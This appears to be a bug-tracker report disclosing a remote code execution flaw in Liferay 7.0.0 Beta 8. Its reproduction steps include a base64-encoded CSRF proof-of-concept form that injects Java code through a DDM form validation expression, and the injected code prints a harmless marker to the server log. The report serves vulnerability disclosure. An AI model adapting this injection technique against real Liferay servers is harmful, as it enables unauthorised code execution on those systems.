Details

    • Story Points:
      1
    • Fix Priority:
      4

      Description

      Any user with permissions to create DDM form can execute full Remote Code Execution.

      Steps to reproduce:
      1, Create a new user test2
      2, Sign in as test2
      3, Get current p_auth token, for example: VQJZvnU7
      4, Get test2 personal site groupId, for example: 20910
      5, Copy & Paste into browser URL bar:

      data:text/html;base64,CjxodG1sPgogIDwhLS0gQ1NSRiBQb0MgLSBnZW5lcmF0ZWQgYnkgQnVycCBTdWl0ZSBQcm9mZXNzaW9uYWwgLS0+CiAgPGJvZHk+CiAgICA8Zm9ybSBhY3Rpb249Imh0dHA6Ly9sb2NhbGhvc3Q6ODA4MC91c2VyL3Rlc3QyL34vY29udHJvbF9wYW5lbC9tYW5hZ2U/cF9wX2lkPWNvbV9saWZlcmF5X2R5bmFtaWNfZGF0YV9saXN0c19mb3JtX3dlYl9wb3J0bGV0X0RETEZvcm1BZG1pblBvcnRsZXQmcF9wX2xpZmVjeWNsZT0xJnBfcF9zdGF0ZT1tYXhpbWl6ZWQmcF9wX21vZGU9dmlldyZfY29tX2xpZmVyYXlfZHluYW1pY19kYXRhX2xpc3RzX2Zvcm1fd2ViX3BvcnRsZXRfRERMRm9ybUFkbWluUG9ydGxldF9qYXZheC5wb3J0bGV0LmFjdGlvbj1hZGRSZWNvcmRTZXQmX2NvbV9saWZlcmF5X2R5bmFtaWNfZGF0YV9saXN0c19mb3JtX3dlYl9wb3J0bGV0X0RETEZvcm1BZG1pblBvcnRsZXRfbXZjUGF0aD0lMkZhZG1pbiUyRmVkaXRfcmVjb3JkX3NldC5qc3AiIG1ldGhvZD0iUE9TVCIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSI+CiAgICAgIHRlc3QyIHVzZXIgZ3JvdXBJZDogPGlucHV0IHR5cGU9InRleHQiIG5hbWU9IiYjOTU7Y29tJiM5NTtsaWZlcmF5JiM5NTtkeW5hbWljJiM5NTtkYXRhJiM5NTtsaXN0cyYjOTU7Zm9ybSYjOTU7d2ViJiM5NTtwb3J0bGV0JiM5NTtERExGb3JtQWRtaW5Qb3J0bGV0JiM5NTtncm91cElkIiB2YWx1ZT0iMjA5MTAiIC8+CiAgICAgIDxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9IiYjOTU7Y29tJiM5NTtsaWZlcmF5JiM5NTtkeW5hbWljJiM5NTtkYXRhJiM5NTtsaXN0cyYjOTU7Zm9ybSYjOTU7d2ViJiM5NTtwb3J0bGV0JiM5NTtERExGb3JtQWRtaW5Qb3J0bGV0JiM5NTtzZXJpYWxpemVkU2V0dGluZ3NERE1Gb3JtVmFsdWVzIiB2YWx1ZT0iJiMxMjM7JnF1b3Q7YXZhaWxhYmxlTGFuZ3VhZ2VJZHMmcXVvdDsmIzU4OyYjOTE7JnF1b3Q7ZW4mIzk1O1VTJnF1b3Q7JiM5MzsmIzQ0OyZxdW90O2RlZmF1bHRMYW5ndWFnZUlkJnF1b3Q7JiM1ODsmcXVvdDtlbiYjOTU7VVMmcXVvdDsmIzQ0OyZxdW90O2ZpZWxkVmFsdWVzJnF1b3Q7JiM1ODsmIzkxOyYjMTIzOyZxdW90O2luc3RhbmNlSWQmcXVvdDsmIzU4OyZxdW90O1RqNjRhZVRxJnF1b3Q7JiM0NDsmcXVvdDtuYW1lJnF1b3Q7JiM1ODsmcXVvdDtlbWFpbFRvQWRkcmVzcyZxdW90OyYjNDQ7JnF1b3Q7dmFsdWUmcXVvdDsmIzU4OyZxdW90OyZxdW90OyYjMTI1OyYjNDQ7JiMxMjM7JnF1b3Q7aW5zdGFuY2VJZCZxdW90OyYjNTg7JnF1b3Q7QUJMdzNnb2gmcXVvdDsmIzQ0OyZxdW90O25hbWUmcXVvdDsmIzU4OyZxdW90O3JlZGlyZWN0VVJMJnF1b3Q7JiM0NDsmcXVvdDt2YWx1ZSZxdW90OyYjNTg7JnF1b3Q7JnF1b3Q7JiMxMjU7JiM0NDsmIzEyMzsmcXVvdDtpbnN0YW5jZUlkJnF1b3Q7JiM1ODsmcXVvdDtuTmZWeVBneiZxdW90OyYjNDQ7JnF1b3Q7bmFtZSZxdW90OyYjNTg7JnF1b3Q7d29ya2Zsb3dEZWZpbml0aW9uJnF1b3Q7JiM0NDsmcXVvdDt2YWx1ZSZxdW90OyYjNTg7JnF1b3Q7JnF1b3Q7JiMxMjU7JiM0NDsmIzEyMzsmcXVvdDtpbnN0YW5jZUlkJnF1b3Q7JiM1ODsmcXVvdDtYUFdhUUtXRCZxdW90OyYjNDQ7JnF1b3Q7bmFtZSZxdW90OyYjNTg7JnF1b3Q7c2VuZEVtYWlsTm90aWZpY2F0aW9uJnF1b3Q7JiM0NDsmcXVvdDt2YWx1ZSZxdW90OyYjNTg7ZmFsc2UmIzEyNTsmIzQ0OyYjMTIzOyZxdW90O2luc3RhbmNlSWQmcXVvdDsmIzU4OyZxdW90O3RXOVpCcnJ5JnF1b3Q7JiM0NDsmcXVvdDtuYW1lJnF1b3Q7JiM1ODsmcXVvdDtlbWFpbEZyb21OYW1lJnF1b3Q7JiM0NDsmcXVvdDt2YWx1ZSZxdW90OyYjNTg7JnF1b3Q7JnF1b3Q7JiMxMjU7JiM0NDsmIzEyMzsmcXVvdDtpbnN0YW5jZUlkJnF1b3Q7JiM1ODsmcXVvdDs1Z0JzeHgycSZxdW90OyYjNDQ7JnF1b3Q7bmFtZSZxdW90OyYjNTg7JnF1b3Q7ZW1haWxGcm9tQWRkcmVzcyZxdW90OyYjNDQ7JnF1b3Q7dmFsdWUmcXVvdDsmIzU4OyZxdW90OyZxdW90OyYjMTI1OyYjNDQ7JiMxMjM7JnF1b3Q7aW5zdGFuY2VJZCZxdW90OyYjNTg7JnF1b3Q7UUUxY3hmUFUmcXVvdDsmIzQ0OyZxdW90O25hbWUmcXVvdDsmIzU4OyZxdW90O2VtYWlsU3ViamVjdCZxdW90OyYjNDQ7JnF1b3Q7dmFsdWUmcXVvdDsmIzU4OyZxdW90OyZxdW90OyYjMTI1OyYjNDQ7JiMxMjM7JnF1b3Q7aW5zdGFuY2VJZCZxdW90OyYjNTg7JnF1b3Q7dlp1U21BSlomcXVvdDsmIzQ0OyZxdW90O25hbWUmcXVvdDsmIzU4OyZxdW90O3B1Ymxpc2hlZCZxdW90OyYjNDQ7JnF1b3Q7dmFsdWUmcXVvdDsmIzU4O2ZhbHNlJiMxMjU7JiM0NDsmIzEyMzsmcXVvdDtpbnN0YW5jZUlkJnF1b3Q7JiM1ODsmcXVvdDtKb2JFbjNnRSZxdW90OyYjNDQ7JnF1b3Q7bmFtZSZxdW90OyYjNTg7JnF1b3Q7cmVxdWlyZUNhcHRjaGEmcXVvdDsmIzQ0OyZxdW90O3ZhbHVlJnF1b3Q7JiM1ODtmYWxzZSYjMTI1OyYjOTM7JiMxMjU7IiAvPgogICAgICA8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSImIzk1O2NvbSYjOTU7bGlmZXJheSYjOTU7ZHluYW1pYyYjOTU7ZGF0YSYjOTU7bGlzdHMmIzk1O2Zvcm0mIzk1O3dlYiYjOTU7cG9ydGxldCYjOTU7RERMRm9ybUFkbWluUG9ydGxldCYjOTU7bmFtZSIgdmFsdWU9IlJlbW90ZSYjMzI7Q29kZSYjMzI7RXhlY3V0aW9uJiMzMjtGb3JtIiAvPgogICAgICA8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSImIzk1O2NvbSYjOTU7bGlmZXJheSYjOTU7ZHluYW1pYyYjOTU7ZGF0YSYjOTU7bGlzdHMmIzk1O2Zvcm0mIzk1O3dlYiYjOTU7cG9ydGxldCYjOTU7RERMRm9ybUFkbWluUG9ydGxldCYjOTU7ZGVmaW5pdGlvbiIgdmFsdWU9IiYjMTIzOyZxdW90O2F2YWlsYWJsZUxhbmd1YWdlSWRzJnF1b3Q7JiM1ODsmIzkxOyZxdW90O2VuJiM5NTtVUyZxdW90OyYjOTM7JiM0NDsmcXVvdDtkZWZhdWx0TGFuZ3VhZ2VJZCZxdW90OyYjNTg7JnF1b3Q7ZW4mIzk1O1VTJnF1b3Q7JiM0NDsmcXVvdDtmaWVsZHMmcXVvdDsmIzU4OyYjOTE7JiMxMjM7JnF1b3Q7dmFsaWRhdGlvbiZxdW90OyYjNTg7JiMxMjM7JnF1b3Q7ZXJyb3JNZXNzYWdlJnF1b3Q7JiM1ODsmcXVvdDtlcnJvciZxdW90OyYjNDQ7JnF1b3Q7ZXhwcmVzc2lvbiZxdW90OyYjNTg7JnF1b3Q7JiM0NzsmIzQyOyYjOTI7JnF1b3Q7JiM0MjsmIzQ3O25ldyYjMzI7T2JqZWN0JiM0MDsmIzQxOyYjMTIzO3B1YmxpYyYjMzI7Ym9vbGVhbiYjMzI7cnVuJiM0MDsmIzQxOyYjMzI7JiMxMjM7Zm9yJiM0MDtPYmplY3QmIzMyO28mIzMyOyYjNTg7JiMzMjtUaHJlYWQmIzQ2O2N1cnJlbnRUaHJlYWQmIzQwOyYjNDE7JiM0NjtnZXRTdGFja1RyYWNlJiM0MDsmIzQxOyYjNDE7JiMzMjtpZiYjMzI7JiM0MDtvJiM0Njt0b1N0cmluZyYjNDA7JiM0MTsmIzQ2O2NvbnRhaW5zJiM0MDsmIzkyOyZxdW90O0RETFJlY29yZExvY2FsU2VydmljZUltcGwmIzQ2O2FkZFJlY29yZCYjOTI7JnF1b3Q7JiM0MTsmIzQxO1N5c3RlbSYjNDY7b3V0JiM0NjtwcmludGxuJiM0MDsmIzkyOyZxdW90O1JlbW90ZSYjMzI7Y29kZSYjMzI7ZXhlY3V0aW9uJiMzMzsmIzkyOyZxdW90OyYjNDE7JiM1OTsmIzMyO3JldHVybiYjMzI7dHJ1ZSYjNTk7JiMxMjU7JiMxMjU7JiM0NjtydW4mIzQwOyYjNDE7JiM0NzsmIzQyOyYjOTI7JnF1b3Q7JiM0MjsmIzQ3OyZxdW90OyYjMTI1OyYjNDQ7JnF1b3Q7cGxhY2Vob2xkZXImcXVvdDsmIzU4OyYjMTIzOyZxdW90O2VuJiM5NTtVUyZxdW90OyYjNTg7JnF1b3Q7JnF1b3Q7JiMxMjU7JiM0NDsmcXVvdDtsb2NhbGl6YWJsZSZxdW90OyYjNTg7dHJ1ZSYjNDQ7JnF1b3Q7bGFiZWwmcXVvdDsmIzU4OyYjMTIzOyZxdW90O2VuJiM5NTtVUyZxdW90OyYjNTg7JnF1b3Q7YWFhJnF1b3Q7JiMxMjU7JiM0NDsmcXVvdDt0eXBlJnF1b3Q7JiM1ODsmcXVvdDt0ZXh0JnF1b3Q7JiM0NDsmcXVvdDtmaWVsZE5hbWVzcGFjZSZxdW90OyYjNTg7JnF1b3Q7JnF1b3Q7JiM0NDsmcXVvdDt0aXAmcXVvdDsmIzU4OyYjMTIzOyZxdW90O2VuJiM5NTtVUyZxdW90OyYjNTg7JnF1b3Q7JnF1b3Q7JiMxMjU7JiM0NDsmcXVvdDtkaXNwbGF5U3R5bGUmcXVvdDsmIzU4OyZxdW90O3NpbmdsZWxpbmUmcXVvdDsmIzQ0OyZxdW90O2luZGV4VHlwZSZxdW90OyYjNTg7JnF1b3Q7a2V5d29yZCZxdW90OyYjNDQ7JnF1b3Q7cHJlZGVmaW5lZFZhbHVlJnF1b3Q7JiM1ODsmIzEyMzsmcXVvdDtlbiYjOTU7VVMmcXVvdDsmIzU4OyZxdW90OyZxdW90OyYjMTI1OyYjNDQ7JnF1b3Q7ZGF0YVR5cGUmcXVvdDsmIzU4OyZxdW90O3N0cmluZyZxdW90OyYjNDQ7JnF1b3Q7cmVhZE9ubHkmcXVvdDsmIzU4O2ZhbHNlJiM0NDsmcXVvdDt2aXNpYmlsaXR5RXhwcmVzc2lvbiZxdW90OyYjNTg7JnF1b3Q7JnF1b3Q7JiM0NDsmcXVvdDtzaG93TGFiZWwmcXVvdDsmIzU4O3RydWUmIzQ0OyZxdW90O25hbWUmcXVvdDsmIzU4OyZxdW90O2FhYSZxdW90OyYjNDQ7JnF1b3Q7cmVwZWF0YWJsZSZxdW90OyYjNTg7ZmFsc2UmIzQ0OyZxdW90O3JlcXVpcmVkJnF1b3Q7JiM1ODtmYWxzZSYjNDQ7JnF1b3Q7dG9vbHRpcCZxdW90OyYjNTg7JiMxMjM7JnF1b3Q7ZW4mIzk1O1VTJnF1b3Q7JiM1ODsmcXVvdDsmcXVvdDsmIzEyNTsmIzEyNTsmIzkzOyYjMTI1OyIgLz4KICAgICAgPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iJiM5NTtjb20mIzk1O2xpZmVyYXkmIzk1O2R5bmFtaWMmIzk1O2RhdGEmIzk1O2xpc3RzJiM5NTtmb3JtJiM5NTt3ZWImIzk1O3BvcnRsZXQmIzk1O0RETEZvcm1BZG1pblBvcnRsZXQmIzk1O2xheW91dCIgdmFsdWU9IiYjMTIzOyZxdW90O3BhZ2VzJnF1b3Q7JiM1ODsmIzkxOyYjMTIzOyZxdW90O2Rlc2NyaXB0aW9uJnF1b3Q7JiM1ODsmIzEyMzsmcXVvdDtlbiYjOTU7VVMmcXVvdDsmIzU4OyZxdW90OyZxdW90OyYjMTI1OyYjNDQ7JnF1b3Q7cm93cyZxdW90OyYjNTg7JiM5MTsmIzEyMzsmcXVvdDtjb2x1bW5zJnF1b3Q7JiM1ODsmIzkxOyYjMTIzOyZxdW90O3NpemUmcXVvdDsmIzU4OzEyJiM0NDsmcXVvdDtmaWVsZE5hbWVzJnF1b3Q7JiM1ODsmIzkxOyZxdW90O2FhYSZxdW90OyYjOTM7JiMxMjU7JiM5MzsmIzEyNTsmIzkzOyYjNDQ7JnF1b3Q7dGl0bGUmcXVvdDsmIzU4OyYjMTIzOyZxdW90O2VuJiM5NTtVUyZxdW90OyYjNTg7JnF1b3Q7YWEmcXVvdDsmIzEyNTsmIzEyNTsmIzkzOyYjMTI1OyIgLz4KICAgICAgPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iJiM5NTtjb20mIzk1O2xpZmVyYXkmIzk1O2R5bmFtaWMmIzk1O2RhdGEmIzk1O2xpc3RzJiM5NTtmb3JtJiM5NTt3ZWImIzk1O3BvcnRsZXQmIzk1O0RETEZvcm1BZG1pblBvcnRsZXQmIzk1O2NoZWNrYm94TmFtZXMiIHZhbHVlPSJwdWJsaXNoQ2hlY2tib3giIC8+CiAgICAgIEN1cnJlbnQgcF9hdXRoOiA8aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0icCYjOTU7YXV0aCIgdmFsdWU9IlZRSlp2blU3IiAvPjxiciAvPgogICAgICA8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iU3VibWl0IHJlcXVlc3QiIC8+CiAgICA8L2Zvcm0+CiAgPC9ib2R5Pgo8L2h0bWw+Cg==

      6, Fill in the obtained p_auth and groupId parameters and submit the form - a new "Remote Code Execution Form" should be created
      7, Go to user public pages (http://localhost:8080/web/test2)
      8, Add Forms portlet and configure to display "Remote Code Execution Form"
      9, Fill any value into the form and save the form

      Expected result: No "Remote Code Execution!" message in server logs
      Actual result: "Remote Code Execution!" message in server logs


      CVSS Base Score: 8.5
      CVSS Temporal Score: 7.7
      CVSS Vector: (AV:N/AC:M/Au:S/C:C/I:C/A:C/E:P/RL:U/RC:C)
      

        Attachments

          Issue Links

            Activity

              People

              • Votes:
                0 Vote for this issue
                Watchers:
                1 Start watching this issue

                Dates

                • Created:
                  Updated:
                  Resolved:
                  Days since last comment:
                  3 years, 27 weeks, 5 days ago

                  Packages

                  Version Package
                  7.0.0 Beta 8